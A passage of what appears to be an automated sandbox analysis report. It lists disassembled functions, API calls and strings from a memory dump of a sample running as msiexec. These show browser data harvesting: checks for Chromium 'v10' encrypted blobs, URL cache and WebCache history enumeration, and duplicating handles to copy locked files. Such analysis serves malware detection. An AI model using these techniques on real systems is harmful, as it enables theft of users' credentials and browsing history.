                                                                                          • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                                        • API String ID: 2744995895-28296030
                                                                                        • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                        • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                        Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040B71C
                                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                                        • memset.MSVCRT ref: 0040B756
                                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                                        • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                        • memset.MSVCRT ref: 0040B851
                                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        • memset.MSVCRT ref: 0040BB53
                                                                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                        • String ID: chp$v10
                                                                                        • API String ID: 4290143792-2783969131
                                                                                        • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                        • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                        Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                        APIs
                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                        • free.MSVCRT ref: 0040E49A
                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                        • memset.MSVCRT ref: 0040E380
                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                        • API String ID: 3849927982-2252543386
                                                                                        • Opcode ID: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                        • Opcode Fuzzy Hash: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                        Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004091E2
                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                        • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                        • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                        • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                        • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                        • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                        • String ID:
                                                                                        • API String ID: 3715365532-3916222277
                                                                                        • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                        • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                        Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                        • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                        • String ID: bhv
                                                                                        • API String ID: 4234240956-2689659898
                                                                                        • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                        • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                        Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                        • API String ID: 2941347001-70141382
                                                                                        • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                        • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                        • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                        • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                        Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                        • String ID:
                                                                                        • API String ID: 2827331108-0
                                                                                        • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                        • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                        • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                        • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                        Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C298
                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                        • String ID: visited:
                                                                                        • API String ID: 1157525455-1702587658
                                                                                        • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                        • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                        Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                        APIs
                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                        • free.MSVCRT ref: 0040E28B
                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                        • API String ID: 2804212203-2982631422
                                                                                        • Opcode ID: 011f1ee4c8a676e7993d49e178f6fd90f7880661b1005521c0cb7dff8e01015d
                                                                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                        • Opcode Fuzzy Hash: 011f1ee4c8a676e7993d49e178f6fd90f7880661b1005521c0cb7dff8e01015d
                                                                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                        Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                        • memset.MSVCRT ref: 0040BC75
                                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 115830560-3916222277
                                                                                        • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                        • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                        Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                                        Strings
                                                                                        Memory Dump Source
